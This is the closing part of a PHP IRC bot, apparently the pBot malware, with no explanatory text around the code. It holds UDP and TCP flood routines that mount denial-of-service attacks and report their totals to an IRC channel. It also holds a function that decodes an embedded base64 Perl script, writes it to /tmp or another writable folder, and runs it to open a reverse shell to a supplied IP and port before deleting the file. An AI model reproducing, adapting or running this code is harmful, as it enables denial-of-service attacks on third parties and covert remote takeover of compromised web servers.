function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”apache”))
$this->nick = “A”;
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”iis”))
$this->nick = “I”;
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”xitami”))
$this->nick = “X”;
else
$this->nick = “U”;
}
else
{
$this->nick = “C”;
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send(“NICK “.$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],”[\2UdpFlood Dimulai bom!\2]“);
$packet = “”;
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen(“udp://”.$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],”[\2UdpFlood Selesai!\2]: $env MB DDOS ATTACK / Media: $vel MB/s “);
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],”[\2TcpFlood Dimulai Bos!\2]“);
$packet = “”;
for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen(“tcp://”.$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],”[\2TcpFlood\2]: Error: <$e>“);
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],”[\2TcpFlood Selesai!\2]: Config – $packets pacotes para $host:$port.”);
}
function sambung($ip,$port)
{
$this->privmsg($this->config['chan'],”[\2sambung\2]: tentando conectando a $ip:$port”);
$dc_source = “IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==”;
if (is_writable(“/tmp”))
{
if (file_exists(“/tmp/dc.pl”)) { unlink(“/tmp/dc.pl”); }
$fp=fopen(“/tmp/dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(“perl /tmp/dc.pl $ip $port &”);
unlink(“/tmp/dc.pl”);
}
else
{
if (is_writable(“/var/tmp”))
{
if (file_exists(“/var/tmp/dc.pl”)) { unlink(“/var/tmp/dc.pl”); }
$fp=fopen(“/var/tmp/dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(“perl /var/tmp/dc.pl $ip $port &”);
unlink(“/var/tmp/dc.pl”);
}
if (is_writable(“.”))
{
if (file_exists(“dc.pl”)) { unlink(“dc.pl”); }
$fp=fopen(“dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(“perl dc.pl $ip $port &”);
unlink(“dc.pl”);
}
}
}
}
$bot = new pBot;
$bot->start();
?>